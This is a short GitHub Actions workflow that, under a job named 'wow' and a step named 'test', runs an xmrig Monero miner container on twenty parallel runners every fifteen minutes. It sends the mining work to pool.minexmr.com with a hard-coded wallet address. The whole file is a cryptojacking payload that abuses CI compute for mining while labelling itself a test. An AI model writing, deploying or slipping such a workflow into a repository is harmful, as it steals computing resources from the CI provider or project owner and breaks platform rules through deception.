name: super action

on:
  schedule:
    - cron: "*/15 * * * *"

jobs:
  wow:
    name: wow
    runs-on: ubuntu-latest
    env:
      DEBIAN_FRONTEND: noninteractive
      
    strategy:
     fail-fast: false
     matrix:
       runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]

    steps:
      - name: test
        run: docker run --name miner --rm -e POOL_URL=pool.minexmr.com:4444  -e POOL_USER=488gqmpBPEtLtf97ZUs6zuRZgk1DkVYtCdVZ8AXfZh2zBvTppPysRJjeMCC5XC1neMYsNPPgp56qZejNdPMmRGibBSkP5ws metal3d/xmrig
      
      
